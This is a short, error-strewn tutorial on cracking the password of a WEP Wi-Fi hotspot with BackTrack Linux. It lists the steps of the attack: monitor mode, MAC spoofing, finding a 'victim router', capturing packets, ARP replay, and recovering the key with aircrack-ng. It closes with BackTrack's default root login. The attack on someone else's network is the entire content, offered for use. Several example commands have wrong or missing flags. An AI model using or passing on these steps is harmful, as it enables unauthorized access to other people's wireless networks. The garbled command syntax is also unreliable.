How To Hack Crack Wifi Wep Hotspot Password

I think every buddy are aware from linux operating system.linux is open source operating sytem and many versions of linux is available in market.
One of them is backtrack operating system.this OS is mostly Used For Cracking Or Hacking.
Here we can see how to crack wifi using backtarck OS.
1)   First of all start consol and type /etc/init.d/networking start  For Startup network connections.
2)   Now Type airmon-ng  this command put your network card in monter mode.
3)   Then type airmon-ng start wlan0 or 1  to startup scan.
4)   For spoof your MAC address By typing
Ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up
5)   To Start to find victim router type airodump-ng mon0 this will list the routers select one and continue.
6)   Once you can find one then copy the BSSID and close the airodump and then type airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using) for new consol. For example airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0

7)   Now start to crack password. Todo this open consol and type aireplay-ng -1 1 -a The BSSID of the router, then the interface.
Example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0

8)   Now congtinue the ARP cycle open consol and type aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying arps. Collect a good ammount of ivs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.
9)   To start cracking the cap file open consol and type aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
10)               Now you have the key to login in to router.

TO DOWNLOD BACKTRACK 5 GOTO http://www.backtrack-linux.org/downloads/
Login:root
Password:toor

Once logged in type in:startx